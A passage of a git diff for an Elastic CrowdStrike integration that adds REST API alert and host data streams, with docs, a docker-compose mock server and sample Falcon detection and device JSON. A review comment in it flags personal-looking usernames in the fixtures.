+ +- `host` dataset: It retrieves all the hosts/devices in your environment providing information such as device metadata, configuration, and status generated by the CrowdStrike Falcon platform, via Falcon Intelligence Host/Device API - `/devices/entities/devices/v2`. It is more focused to provide the management and monitoring information of devices such as login details, status, policies, configuration etc. + +3. Falcon Data Replicator: This Collect events in near real time from your endpoints and cloud workloads, identities and data. CrowdStrike Falcon Data Replicator (FDR) enables you with actionable insights to improve SOC performance. FDR contains near real-time data collected by the Falcon platform's single, lightweight agent. It includes the following datasets for receiving logs: + - `fdr` dataset: consists of logs forwarded using the [Falcon Data Replicator](https://github.com/CrowdStrike/FDR). ## Compatibility -This integration supports CrowdStrike Falcon SIEM-Connector-v2.0. +This integration is compatible with both CrowdStrike Falcon SIEM-Connector-v2.0 and REST API. +For Rest API support, this module has been tested against the **CrowdStrike API Version v1/v2**. + +The minimum **kibana.version** required is **8.12.0**. + +## Setup +### To collect data from CrowdStrike REST API, the following parameters from your CrowdStrike instance are required: + +1. Client ID +2. Client Secret +3. Token url +4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Alert | read:alert | + | Host | read:host | ## Logs +### Alert + +This is the `Alert` dataset. + +#### Example + +{{event "alert"}} + +{{fields "alert"}} + ### Falcon Contains endpoint data and CrowdStrike Falcon platform audit data forwarded from Falcon SIEM Connector. 
@@ -37,6 +74,7 @@ Current supported event types are: - Mobile Detection events - Recon Notification events - XDR Detection events +- Scheduled Report Notification events {{fields "falcon"}} @@ -171,3 +209,13 @@ and/or `session_token`. {{fields "fdr"}} {{event "fdr"}} + +### Host + +This is the `Host` dataset. + +#### Example + +{{event "host"}} + +{{fields "host"}} diff --git a/packages/crowdstrike/_dev/deploy/docker/docker-compose.yml b/packages/crowdstrike/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..30a764a17aa --- /dev/null +++ b/packages/crowdstrike/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,28 @@ +version: '2.3' +services: + crowdstrike-alert: + image: docker.elastic.co/observability/stream:v0.13.0 + hostname: crowdstrike-alert + ports: + - 8090 + volumes: + - ./files:/files:ro + environment: + PORT: '8090' + command: + - http-server + - --addr=:8090 + - --config=/files/config-alert.yml + crowdstrike-host: + image: docker.elastic.co/observability/stream:v0.13.0 + hostname: crowdstrike-host + ports: + - 8090 + volumes: + - ./files:/files:ro + environment: + PORT: '8090' + command: + - http-server + - --addr=:8090 + - --config=/files/config-host.yml diff --git a/packages/crowdstrike/_dev/deploy/docker/files/config-alert.yml b/packages/crowdstrike/_dev/deploy/docker/files/config-alert.yml new file mode 100644 index 00000000000..0d862d79005 --- /dev/null +++ b/packages/crowdstrike/_dev/deploy/docker/files/config-alert.yml 
@@ -0,0 +1,482 @@ +rules: + - path: /oauth2/token + methods: ['POST'] + responses: + - status_code: 200 + headers: + Content-Type: + - 'application/json' + body: | + {"access_token":"xxxx","expires_in":3600,"token_type":"Bearer","refresh_token":"yyyy"} + - path: /alerts/queries/alerts/v2 + methods: ['GET'] + query_params: + offset: 0 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017724698,"pagination":{"offset":0,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"a21557a2-abd0-4363-9293-727c38084b3b"},"resources":["abc"]} + - path: /alerts/queries/alerts/v2 + methods: ['GET'] + query_params: + offset: 1 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017734699,"pagination":{"offset":1,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"cc557a2-aad0-4364-9293-727c38084n3b"},"resources":["def"]} + - path: /alerts/entities/alerts/v2 + methods: ['POST'] + request_body: /.*"abc"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_id":"2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id":"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype":"exe", + "cid":"92012896127c4a948236ba7601b886b0", + "cloud_indicator":"false", + "cmdline":"\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id":"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence":10, + "context_timestamp":"2023-11-03T18:00:31Z", + "control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", 
+ "crawl_edge_ids":{ + "Sensor":[ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids":{ + "Sensor":[ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp":"2023-11-03T19:00:23.985020992Z", + "created_timestamp":"2023-11-03T18:01:23.995794943Z", + "data_domains":[ + "Endpoint" + ], + "description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device":{ + "agent_load_flags":"0", + "agent_local_time":"2023-10-12T03:45:57.753Z", 
+ "agent_version":"7.04.17605.0", + "bios_manufacturer":"ABC", + "bios_version":"F8CN42WW(V2.05)", + "cid":"92012896127c4a948236ba7601b886b0", + "config_id_base":"65994763", + "config_id_build":"17605", + "config_id_platform":"3", + "device_id":"2ce412d17b334ad4adc8c1c54dbfec4b", + "external_ip":"81.2.69.142", + "first_seen":"2023-04-07T09:36:36Z", + "groups":[ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo":{ + "active_directory_dn_display":[ + "WinComputers", + "WinComputers\\ABC" + ], + "domain":"ABC.LOCAL" + }, + "hostname":"ABC709-1175", + "last_seen":"2023-11-03T17:51:42Z", + "local_ip":"81.2.69.142", + "mac_address":"ab-21-48-61-05-b2", + "machine_domain":"ABC.LOCAL", + "major_version":"10", + "minor_version":"0", + "modified_timestamp":"2023-11-03T17:53:43Z", + "os_version":"Windows11", + "ou":[ + "ABC", + "WinComputers" + ], + "platform_id":"0", + "platform_name":"Windows", + "pod_labels":null, + "product_type":"1", + "product_type_desc":"Workstation", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"LENOVO", + "system_product_name":"20VE" + }, + "falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details":{ + "cmdline":"C:\\Windows\\system32\\userinit.exe", + "filename":"userinit.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id":"4328", + "md5":"b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + 
"process_id":"392734873135", + "sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp":"2023-10-30T16:49:19Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"yuvraj.mahajan" + }, + "has_script_or_module_ioc":"true", + "id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context":[ + { + "ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source":"library_load", + "ioc_type":"hash_sha256", + "ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type":"module" + } + ], + "ioc_values":[], + "is_synthetic_quarantine_disposition":true, + "local_process_id":"17076", + "logon_domain":"ABSYS", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "name":"PrewittPupAdwareSensorDetect-Lowest", + "objective":"FalconDetectionMethod", + "parent_details":{ + "cmdline":"C:\\WINDOWS\\Explorer.EXE", + "filename":"explorer.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id":"1040", + "md5":"8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id":"392736520876", + "sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp":"2023-11-03T18:00:32Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + 
"user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + }, + "parent_process_id":"392736520876", + "pattern_disposition":2176, + "pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details":{ + "blocking_unsupported_or_disabled":false, + "bootup_safeguard_enabled":false, + "critical_process_disabled":false, + "detect":false, + "fs_operation_blocked":false, + "handle_operation_downgraded":false, + "inddet_mask":false, + "indicator":false, + "kill_action_failed":false, + "kill_parent":false, + "kill_process":false, + "kill_subprocess":false, + "operation_blocked":false, + "policy_disabled":false, + "process_blocked":true, + "quarantine_file":true, + "quarantine_machine":false, + "registry_operation_blocked":false, + "rooting":false, + "sensor_only":false, + "suspend_parent":false, + "suspend_process":false + }, + "pattern_id":5761, + "platform":"Windows", + "poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time":"1699034421", + "process_id":"399748687993", + "process_start_time":"1699034413", + "product":"epp", + "quarantined_files":[ + { + "filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state":"quarantined" + } + ], + "scenario":"NGAV", + "severity":30, + "sha1":"0000000000000000000000000000000000000000", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui":true, + "source_products":[ + "FalconInsight" + ], + 
"source_vendors":[ + "CrowdStrike" + ], + "status":"new", + "tactic":"MachineLearning", + "tactic_id":"CSTA0004", + "technique":"Adware/PUP", + "technique_id":"CST0000", + "timestamp":"2023-11-03T18:00:22.328Z", + "tree_id":"1931778", + "tree_root":"38687993", + "triggering_process_graph_id":"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type":"ldt", + "updated_timestamp":"2023-11-03T19:00:23.985007341Z", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + } + ] + } + - path: /alerts/entities/alerts/v2 + methods: ['POST'] + request_body: /.*"def"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_id":"3cd412d17b334bb4adc8c1c54dbfec4b", + "aggregate_id":"aggind:6ce415d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype":"exe", + "cid":"12012896127c48236ba7601b886b0", + "cloud_indicator":"true", + "cmdline":"\"C:\\Users\\yuvraj.jha\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id":"9289012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence":11, + "context_timestamp":"2023-11-04T18:00:31Z", + "control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids":{ + "Sensor":[ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + 
"N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids":{ + "Sensor":[ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp":"2023-11-03T19:00:23.985020992Z", + "created_timestamp":"2023-11-03T18:01:23.995794943Z", + "data_domains":[ + "Endpoint" + ], + "description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device":{ + "agent_load_flags":"0", + "agent_local_time":"2023-10-12T03:45:57.753Z", + "agent_version":"7.04.17605.0", + "bios_manufacturer":"ABC", + "bios_version":"F8CN42WW(V2.05)", + "cid":"92012896127c4a948236ba7601b886b0", + "config_id_base":"65994763", + "config_id_build":"17605", + "config_id_platform":"3", + "device_id":"2ce412d17b334ad4adc8c1c54dbfec4b", + "external_ip":"81.2.69.142", + "first_seen":"2023-04-07T09:36:36Z", + "groups":[ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo":{ + "active_directory_dn_display":[ + 
"WinComputers", + "WinComputers\\ABC" + ], + "domain":"ABC.LOCAL" + }, + "hostname":"ABC709-1175", + "last_seen":"2023-11-03T17:51:42Z", + "local_ip":"81.2.69.142", + "mac_address":"ab-21-48-61-05-b2", + "machine_domain":"ABC.LOCAL", + "major_version":"10", + "minor_version":"0", + "modified_timestamp":"2023-11-03T17:53:43Z", + "os_version":"Windows11", + "ou":[ + "ABC", + "WinComputers" + ], + "platform_id":"0", + "platform_name":"Windows", + "pod_labels":null, + "product_type":"1", + "product_type_desc":"Workstation", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"LENOVO", + "system_product_name":"20VE" + }, + "falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details":{ + "cmdline":"C:\\Windows\\system32\\userinit.exe", + "filename":"userinit.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id":"4328", + "md5":"b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id":"392734873135", + "sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp":"2023-10-30T16:49:19Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"yuvraj.mahajan" + }, + "has_script_or_module_ioc":"true", + "id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + 
"indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context":[ + { + "ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source":"library_load", + "ioc_type":"hash_sha256", + "ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type":"module" + } + ], + "ioc_values":[], + "is_synthetic_quarantine_disposition":true, + "local_process_id":"17076", + "logon_domain":"ABSYS", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "name":"PrewittPupAdwareSensorDetect-Lowest", + "objective":"FalconDetectionMethod", + "parent_details":{ + "cmdline":"C:\\WINDOWS\\Explorer.EXE", + "filename":"explorer.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id":"1040", + "md5":"8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id":"392736520876", + "sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp":"2023-11-03T18:00:32Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + }, + "parent_process_id":"392736520876", + "pattern_disposition":2176, + "pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details":{ + "blocking_unsupported_or_disabled":false, + "bootup_safeguard_enabled":false, + "critical_process_disabled":false, + "detect":false, + "fs_operation_blocked":false, + 
"handle_operation_downgraded":false, + "inddet_mask":false, + "indicator":false, + "kill_action_failed":false, + "kill_parent":false, + "kill_process":false, + "kill_subprocess":false, + "operation_blocked":false, + "policy_disabled":false, + "process_blocked":true, + "quarantine_file":true, + "quarantine_machine":false, + "registry_operation_blocked":false, + "rooting":false, + "sensor_only":false, + "suspend_parent":false, + "suspend_process":false + }, + "pattern_id":5761, + "platform":"Windows", + "poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time":"1699034421", + "process_id":"399748687993", + "process_start_time":"1699034413", + "product":"epp", + "quarantined_files":[ + { + "filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state":"quarantined" + } + ], + "scenario":"NGAV", + "severity":30, + "sha1":"0000000000000000000000000000000000000000", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui":true, + "source_products":[ + "FalconInsight" + ], + "source_vendors":[ + "CrowdStrike" + ], + "status":"new", + "tactic":"MachineLearning", + "tactic_id":"CSTA0004", + "technique":"Adware/PUP", + "technique_id":"CST0000", + "timestamp":"2023-11-04T18:00:22.328Z", + "tree_id":"1931778", + "tree_root":"38697993", + "triggering_process_graph_id":"pid:2ce4114ad4adc8c1c54dbfec4b:399748687993", + "type":"ldt", + "updated_timestamp":"2023-11-04T19:00:23.985007341Z", + "user_id":"S-1-5-21-19999377054-3469629671-4104191496-4425", + 
"user_name":"mohit.jha" + } + ] + } diff --git a/packages/crowdstrike/_dev/deploy/docker/files/config-host.yml b/packages/crowdstrike/_dev/deploy/docker/files/config-host.yml new file mode 100644 index 00000000000..181f20c1e5f --- /dev/null +++ b/packages/crowdstrike/_dev/deploy/docker/files/config-host.yml 
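Review bot: The mock responses carry what look like real user identities rather than synthetic test data: `"user_name":"yuvraj.mahajan"` and `"user_name":"mohit.jha"`, the same names repeated inside `cmdline`, `filepath`, `ioc_description` and `quarantined_files[].filename`, together with a full domain SID in `user_id`/`user_graph_id` and a `machine_domain`. This file ships in a public repository and its output becomes the README example event, so these should be replaced with obviously fake values (for example `jane.doe`, a made-up `S-1-5-21-...` SID and a fictional domain) while keeping the same structure so the pipeline test still exercises the path and user parsing. Separately, both records set `local_ip` and `external_ip` to the identical `81.2.69.142`, which means a mapping bug that swaps or merges the two address fields would go unnoticed; giving `local_ip` a private address such as `10.0.0.5` would make that distinction testable.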
@@ -0,0 +1,284 @@ +rules: + - path: /oauth2/token + methods: ['POST'] + responses: + - status_code: 200 + headers: + Content-Type: + - 'application/json' + body: | + {"access_token":"xxxx","expires_in":3600,"token_type":"Bearer","refresh_token":"yyyy"} + - path: /devices/queries/devices/v1 + methods: ['GET'] + query_params: + offset: 0 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017724698,"pagination":{"offset":0,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"a21557a2-abd0-4363-9293-727c38084b3b"},"resources":["abc"]} + - path: /devices/queries/devices/v1 + methods: ['GET'] + query_params: + offset: 1 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017724698,"pagination":{"offset":1,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"b21557a2-abd0-4363-9293-727c384b3b"},"resources":["def"]} + - path: /devices/entities/devices/v2 + methods: ['POST'] + request_body: /.*"abc"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_load_flags":"0", + "agent_local_time":"2023-11-07T04:51:16.678Z", + "agent_version":"7.05.17603.0", + "bios_manufacturer":"ABCInc.", + "bios_version":"2020.0.1.0.0(iBridge:22.11.000.0.0,0)", + "chassis_type":"9", + "chassis_type_desc":"Laptop", + "cid":"92012896127c4948236ba7601b886b0", + "config_id_base":"6594763", + "config_id_build":"1703", + "config_id_platform":"4", + "connection_ip":"81.2.69.192", + "cpu_signature":"460517", + "device_id":"3114433dbce478ca48d9a828b9b34be", + "device_policies":{ + "device_control":{ + "applied":true, + "applied_date":"2023-06-20T08:45:26.341093915Z", + "assigned_date":"2023-06-20T08:43:47.736146738Z", + "policy_id":"2f88daf0177f467dae69262a5ce71775", + "policy_type":"device-control" + 
}, + "firewall":{ + "applied":true, + "applied_date":"2023-09-11T10:33:44.174488832Z", + "assigned_date":"2023-09-11T10:32:47.853976945Z", + "policy_id":"1ee301f7e3e24e96ad6a23c73aaac1e3", + "policy_type":"firewall", + "rule_set_id":"1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config":{ + "applied":true, + "applied_date":"2023-11-07T04:52:59.515775409Z", + "assigned_date":"2023-11-07T04:51:18.94671252Z", + "policy_id":"7e3078b60976486cac5dc998808d9135", + "policy_type":"globalconfig", + "settings_hash":"f01def74" + }, + "prevention":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.643357971Z", + "assigned_date":"2023-06-08T10:03:49.505180252Z", + "policy_id":"1024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"f7a54ca1" + }, + "remote_response":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.01735027Z", + "assigned_date":"2023-06-08T10:03:49.505163572Z", + "policy_id":"dabb4def99034f11b9b3d52271584c9f", + "policy_type":"remote-response", + "settings_hash":"8a548e5e" + }, + "sensor_update":{ + "applied":true, + 